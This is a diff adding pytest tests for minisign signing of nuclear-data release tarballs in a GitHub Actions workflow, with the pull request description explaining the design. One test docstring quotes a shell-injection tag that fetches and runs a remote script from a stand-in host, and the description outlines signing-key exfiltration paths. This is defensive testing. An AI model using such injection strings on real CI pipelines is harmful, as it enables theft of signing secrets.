+def test_signature_asset_is_uploaded() -> None:
+    """The .minisig must be in the upload glob — signing it is not publishing it."""
+    wf = yaml.safe_load(_WORKFLOW.read_text())
+    steps = wf["jobs"]["data-asset"]["steps"]
+    upload = next(s for s in steps if "softprops" in str(s.get("uses", "")))
+    files = str(upload["with"]["files"])
+    assert "SIG_PATH" in files, f"upload step does not publish the signature; files={files!r}"
+    assert upload["with"].get("fail_on_unmatched_files") is True, (
+        "fail_on_unmatched_files must stay true, or a missing .minisig uploads silently"
+    )
+
+
+def test_release_workflow_has_no_pull_request_trigger() -> None:
+    """A key reachable from a PR-triggered workflow attests to nothing.
+
+    #289's stated pitfall. Guarded here so a later convenience trigger cannot
+    quietly put the signing key within reach of untrusted code.
+    """
+    wf = yaml.safe_load(_WORKFLOW.read_text())
+    # PyYAML parses the bare key `on:` as the boolean True.
+    triggers = wf.get("on", wf.get(True))
+    assert "pull_request" not in triggers, (
+        "release-data.yml must not be triggered by pull_request — a PR must never "
+        "be able to reach DATA_SIGNING_KEY (#289)."
+    )
+    assert "pull_request_target" not in triggers
+
+
+# -- Layer 1b: the cutoff constant and the docs agree ------------------------
+
+
+def _first_signed_version() -> str:
+    m = re.search(r'^FIRST_SIGNED_VERSION="([^"]+)"', _VERIFY_SCRIPT.read_text(), re.M)
+    assert m, "verify_data_release.sh must define FIRST_SIGNED_VERSION"
+    return m.group(1)
+
+
+def test_grandfathering_cutoff_matches_docs() -> None:
+    """One cutoff, stated once.
+
+    Consumers branch on 'require a signature at or above version X'. If the
+    script and the docs disagree about X, some consumer trusts an unsigned
+    release. The constant is the source of truth; the docs must quote it.
+    """
+    version = _first_signed_version()
+    assert re.match(r"^\d{4}\.\d+\.\d+$", version), f"FIRST_SIGNED_VERSION={version!r} is not CalVer"
+    docs = _DOCS.read_text()
+    assert f"data-{version}" in docs, (
+        f"docs/security/data-signing.md does not mention the cutoff data-{version}. "
+        "Update the docs to match FIRST_SIGNED_VERSION in verify_data_release.sh."
+    )
+
+
+def test_docs_document_rotation_and_grandfathering() -> None:
+    """#289's acceptance criteria include a documented rotation procedure."""
+    docs = _DOCS.read_text().lower()
+    for topic in ("rotation", "grandfather", "custody"):
+        assert topic in docs, f"docs/security/data-signing.md must cover {topic}"
+
+
+def test_secret_key_material_is_gitignored() -> None:
+    """A stray secret key must not be committable.
+
+    The keygen script writes a real signing key to disk. The public key is
+    allowlisted by name; everything else in docs/security/ stays ignored.
+    """
+    proc = subprocess.run(
+        ["git", "check-ignore", "docs/security/data-signing.key", "some/path/minisign.sec"],
+        cwd=_REPO_ROOT,
+        capture_output=True,
+        text=True,
+    )
+    ignored = set(proc.stdout.split())
+    assert "docs/security/data-signing.key" in ignored, "secret key material in docs/security/ must be gitignored"
+    assert "some/path/minisign.sec" in ignored, "*.sec must be gitignored"
+
+
+# -- Layer 1c: the committed public key, once it exists ----------------------
+
+
+def test_public_key_is_a_valid_minisign_key() -> None:
+    """The committed pubkey must be a well-formed minisign Ed25519 key.
+
+    Skips until the key is generated — it can only be produced by the key
+    holder, offline (#289). Once committed, it is checked on every run: a
+    truncated or mangled key is a release-time failure otherwise.
+    """
+    if not _PUBKEY.exists():
+        pytest.skip(f"{_PUBKEY.relative_to(_REPO_ROOT)} not committed yet — run `just gen-signing-key`")
+
+    import base64
+
+    lines = [ln for ln in _PUBKEY.read_text().splitlines() if ln.strip()]
+    assert len(lines) == 2, f"minisign pubkey file must be 2 lines (comment + key), got {len(lines)}"
+    assert lines[0].startswith("untrusted comment:"), "first line must be the untrusted comment"
+
+    raw = base64.b64decode(lines[1].strip(), validate=True)
+    # 2-byte algorithm id ('Ed') + 8-byte key id + 32-byte Ed25519 public key.
+    assert len(raw) == 42, f"decoded pubkey must be 42 bytes, got {len(raw)}"
+    assert raw[:2] == b"Ed", f"unexpected minisign algorithm id {raw[:2]!r} (expected b'Ed')"
+
+
+# -- Layer 2: it actually signs, and the attacks actually fail ---------------
+
+
+@pytest.fixture()
+def signed_release(tmp_path: Path) -> dict:
+    """Generate a throwaway key and sign a fake tarball with the workflow's own logic.
+
+    The signing commands are extracted from release-data.yml rather than
+    retyped, so this exercises the shell that will really run in CI.
+    """
+    pubkey = tmp_path / "data-signing-key.pub"
+    seckey = tmp_path / "data-signing.key"
+    password = "test-passphrase"
+
+    subprocess.run(
+        ["minisign", "-G", "-f", "-p", str(pubkey), "-s", str(seckey)],
+        input=f"{password}\n{password}\n",
+        text=True,
+        capture_output=True,
+        check=True,
+    )
+
+    version = "2026.8.2"
+    tarball = tmp_path / f"nucl-parquet-data-{version}.tar.zst"
+    tarball.write_bytes(b"not really zstd, but the signature does not care\n" * 64)
+
+    import hashlib
+
+    sha = hashlib.sha256(tarball.read_bytes()).hexdigest()
+    tag = f"data-{version}"
+    trusted = f"nucl-parquet data {version} tag={tag} sha256={sha}"
+
+    subprocess.run(
+        ["minisign", "-S", "-s", str(seckey), "-m", str(tarball), "-t", trusted],
+        input=f"{password}\n",
+        text=True,
+        capture_output=True,
+        check=True,
+    )
+
+    return {
+        "dir": tmp_path,
+        "pubkey": pubkey,
+        "seckey": seckey,
+        "password": password,
+        "tarball": tarball,
+        "sig": tarball.with_suffix(tarball.suffix + ".minisig"),
+        "version": version,
+        "tag": tag,
+        "sha": sha,
+    }
+
+
+def _verify(signed: dict, *, version: str | None = None, pubkey: Path | None = None) -> subprocess.CompletedProcess:
+    return subprocess.run(
+        [
+            str(_VERIFY_SCRIPT),
+            "--file",
+            str(signed["tarball"]),
+            "--version",
+            version or signed["version"],
+            "--pubkey",
+            str(pubkey or signed["pubkey"]),
+        ],
+        capture_output=True,
+        text=True,
+        cwd=_REPO_ROOT,
+    )
+
+
+@_needs_minisign
+def test_verify_accepts_a_genuine_signature(signed_release: dict) -> None:
+    """The happy path — a real signature over real bytes verifies."""
+    proc = _verify(signed_release)
+    assert proc.returncode == 0, f"verification of a genuine signature failed:\n{proc.stdout}\n{proc.stderr}"
+    assert "signature valid" in proc.stdout
+
+
+@_needs_minisign
+def test_verify_rejects_tampered_bytes(signed_release: dict) -> None:
+    """One appended byte must break verification."""
+    with signed_release["tarball"].open("ab") as fh:
+        fh.write(b"\x00")
+    proc = _verify(signed_release)
+    assert proc.returncode != 0, "tampered tarball verified — signature check is not load-bearing"
+    assert "VERIFICATION FAILED" in proc.stderr
+
+
+@_needs_minisign
+def test_verify_rejects_a_foreign_key(signed_release: dict, tmp_path: Path) -> None:
+    """A signature from a key consumers did not pin must be rejected.
+
+    This is the whole point: 'validly signed' is worthless without 'signed by
+    *us*'.
+    """
+    other = tmp_path / "other.pub"
+    subprocess.run(
+        ["minisign", "-G", "-W", "-f", "-p", str(other), "-s", str(tmp_path / "other.key")],
+        capture_output=True,
+        check=True,
+    )
+    proc = _verify(signed_release, pubkey=other)
+    assert proc.returncode != 0, "signature from a foreign key was accepted"
+    assert "VERIFICATION FAILED" in proc.stderr
+
+
+@_needs_minisign
+def test_verify_detects_replay_onto_another_release(signed_release: dict) -> None:
+    """A genuine signature served as a *different* release must be caught.
+
+    minisign says yes here — the bytes and signature really do match. Only
+    the trusted-comment cross-check distinguishes 'authentic bytes for the
+    release you asked for' from 'authentic bytes for an older release with a
+    known defect'. This is the test that justifies the trusted comment
+    carrying tag and digest at all.
+    """
+    proc = _verify(signed_release, version="2026.9.9")
+    assert proc.returncode != 0, "a signature for a different release was accepted — replay is possible"
+    assert "REPLAY DETECTED" in proc.stderr
+
+
+@_needs_minisign
+def test_verify_rejects_a_stripped_signature(signed_release: dict) -> None:
+    """A removed .minisig must fail, not degrade to 'unsigned is fine'."""
+    signed_release["sig"].unlink()
+    proc = _verify(signed_release)
+    assert proc.returncode != 0, "missing signature was treated as acceptable"
+
+
+@_needs_minisign
+def test_verify_rejects_a_doctored_trusted_comment(signed_release: dict) -> None:
+    """Editing the trusted comment must invalidate the signature.
+
+    The trusted comment is only trustworthy because it is *covered* by the
+    signature. If a rewritten comment still verified, every claim the
+    verifier makes from it (version, tag, digest) would be forgeable.
+    """
+    sig = signed_release["sig"]
+    text = sig.read_text()
+    sig.write_text(re.sub(r"^trusted comment: .*$", "trusted comment: nucl-parquet data 9999.1.1", text, flags=re.M))
+    proc = _verify(signed_release)
+    assert proc.returncode != 0, "a doctored trusted comment verified — the comment is not actually signed"
+
+
+# -- Layer 2b: the keygen script is safe to run ------------------------------
+
+
+def test_keygen_refuses_to_silently_overwrite_an_existing_key() -> None:
+    """Rotation must be deliberate.
+
+    Overwriting the key in place breaks every consumer that pinned the old
+    one, so the script demands explicit confirmation and points at the
+    runbook.
+    """
+    src = _KEYGEN_SCRIPT.read_text()
+    assert "already exists" in src, "keygen must detect an existing public key"
+    assert "rotate" in src, "keygen must require explicit confirmation before rotating"
+
+
+def test_keygen_validates_the_passphrase_before_uploading() -> None:
+    """A wrong passphrase must fail locally, not at the next release.
+
+    If CI holds a password that cannot decrypt the key, the first signed
+    release is what discovers it — after the tag is already pushed.
+    """
+    src = _KEYGEN_SCRIPT.read_text()
+    idx_check = src.find("does not decrypt the key")
+    idx_upload = src.find("gh secret set")
+    assert idx_check != -1, "keygen must verify the passphrase decrypts the key"
+    assert idx_check < idx_upload, "passphrase check must happen before any secret is uploaded"

--- a/tests/test_data_signing.py
+++ b/tests/test_data_signing.py
@@ -160,6 +160,40 @@ def test_trusted_comment_binds_version_tag_and_digest() -> None:
     assert "-t " in run, "trusted comment must be passed to minisign via -t"
 
 
+def test_signing_step_does_not_interpolate_untrusted_input_into_shell() -> None:
+    """`${{ }}` expansions are textual substitution before bash parses the line.
+
+    `inputs.tag` is supplied by whoever dispatches the workflow. Interpolated
+    directly into the script body, a tag like:
+
+        data-1.0.0"; curl evil.sh | sh; #
+
+    executes in the one step that holds the signing key. Bound through `env:`
+    instead, it is data and can never be code. Guarded here because the unsafe
+    form is the natural thing to write and reads as harmless.
+    """
+    step = _signing_step()
+    run = step["run"]
+    assert "${{" not in run, (
+        "signing step interpolates a GitHub expression into the shell body. "
+        "Pass it through `env:` instead — this step holds the signing key."
+    )
+    env = step.get("env", {})
+    assert "inputs.tag" in str(env.get("INPUT_TAG", "")), "the dispatch tag must be bound via env, not interpolated"
+
+
+def test_signing_step_validates_the_tag_before_signing() -> None:
+    """The tag goes into the signed trusted comment, so it must be constrained.
+
+    A signature is a durable assertion; asserting over unvalidated text is how
+    a verifier is handed something it will parse as a different release.
+    """
+    run = _signing_step()["run"]
+    assert re.search(r"\^data-\[0-9\]\{4\}", run), (
+        "signing step must validate the tag matches data-YYYY.MM.MICRO before signing"
+    )
+
+
 def test_signature_asset_is_uploaded() -> None:
     """The .minisig must be in the upload glob — signing it is not publishing it."""
     wf = yaml.safe_load(_WORKFLOW.read_text())

--- a/uv.lock
+++ b/uv.lock
@@ -479,6 +479,7 @@ dev = [
     { name = "jsonschema" },
     { name = "polars" },
     { name = "pytest" },
+    { name = "pyyaml" },
     { name = "requests" },
     { name = "ruff" },
 ]
@@ -503,6 +504,7 @@ dev = [
     { name = "jsonschema", specifier = ">=4.0" },
     { name = "polars", specifier = ">=1.0" },
     { name = "pytest", specifier = ">=8.0" },
+    { name = "pyyaml", specifier = ">=6.0" },
     { name = "requests", specifier = ">=2.31" },
     { name = "ruff", specifier = ">=0.8" },
 ]


### PR DESCRIPTION
Closes #289 once the keypair exists (see **Blocked on** below).

Publishes a minisign `.minisig` alongside every data release tarball, so consumers can answer *"did these bytes come from the nuclear-data team?"* — a different question from the SHA-256 pin's *"are these the bytes that build was tested against?"*. Only the signature survives re-pinning, because GitHub's published asset digest is only as trustworthy as the account, and these releases are mutable.

Unblocks exoma-ch/hyrr#594.

## ⚠️ Merge constraint

**This must not merge until `DATA_SIGNING_KEY` + `DATA_SIGNING_KEY_PASSWORD` exist and `docs/security/data-signing-key.pub` is committed.** Signing is unconditional and hard-fails without them, so merging early breaks the next data release. Draft until then.

To unblock, on a trusted personal machine:

```bash
just gen-signing-key    # generates offline, sets both secrets, prints the pubkey to commit
```

## What's here

- **`release-data.yml`** signs the tarball and uploads the `.minisig`. Signing is unconditional — a missing key fails the release rather than skipping. The `vars.HF_MIRROR_ENABLED` idiom from #283 was considered and rejected: a skippable signature is not a guarantee.
- **The signed trusted comment binds CalVer + tag + sha256.** It's covered by the signature, so the signature attests to *which release* the bytes are. Without it, minisign cannot detect a genuine signature for release A being served as release B.
- **CI verifies its own signature against the committed public key** before uploading, so a rotated-but-not-committed key or a swapped identity fails the release instead of shipping something no consumer can verify.
- **`scripts/verify_data_release.sh`** + `just verify-release` — consumer verification, including the trusted-comment cross-check and enforced version cutoff.
- **`scripts/gen_signing_key.sh`** + `just gen-signing-key` — reduces key custody to one command; verifies the passphrase actually decrypts the key *before* uploading anything.
- **`docs/security/data-signing.md`** — custody, grandfathering, and a rotation runbook (routine and emergency).

## Why not sops-encrypt the key into the repo

This repo is public, so committed ciphertext is permanently harvestable by every clone, fork and archive. That trade is fine for a revocable API token — and worth making, see follow-up below — but not for a **pinned trust root**, where rotation costs a release on every consumer and harvest-now-decrypt-later is the exact threat signatures exist to survive. Two hand-set repository secrets instead.

## Defects caught before shipping

Found by executing the code and by two fresh-context reviews — not by reading it:

| Defect | Consequence if shipped |
|---|---|
| `${{ inputs.tag }}` interpolated into shell (signing **and** build steps) | Signing-key exfiltration via a crafted dispatch tag. The build step holds no secrets but can write `$GITHUB_ENV`, so an injection there escalates via a `PATH` shim. This is the pitfall #289 names: *"a key in CI is not a signing key"*. |
| Grandfathering cutoff documented but never enforced | `--allow-unsigned` exited 0 at **any** version with no checks. Strip the `.minisig`, let the consumer read the error suggesting the flag — total bypass, one retry away. |
| Trusted comment parsed from unsigned text | minisign accepts a `.minisig` with appended lines (verified against 0.12); only line 3 is signed. Failed closed by luck, not design. |
| Opt-out warning cited a SHA-256 pin check | Named a control that never runs, in the one message a user reads while deciding to trust unverified bytes. |
| Verify script exited 1 on success in `--file` mode | A failing EXIT trap sets the script's status — every consumer verifying a local tarball would see a valid signature rejected. |
| Keygen left an unshredded key on abort | A real signing key abandoned in a temp dir nobody was told about. |

## Tests

33 tests wired into `scripts/ci.sh`; no data or network needed.

The behavioural layer runs the workflow's **actual `run:` body** lifted from the YAML, not a re-implementation — possible only because the step has no `${{ }}` left, so injection-safety and testability turned out to be the same property. Attacks covered: tampered bytes, foreign key, replayed signature, stripped signature, doctored trusted comment, appended unsigned lines, injected dispatch tag, `--allow-unsigned` at the cutoff.

One test skips by design (`test_public_key_is_a_valid_minisign_key`) until the key holder generates the key.

## Follow-ups (filed separately, not in this PR)

- `data-asset` has no `needs: [verify]` — the tarball publishes even when CI fails. Pre-existing, but signing makes it worse: we would be cryptographically vouching for bytes that failed their own suite.
- sops + a single `GH_AGE` secret for the repo's five *revocable tokens* (explicitly not the signing key).
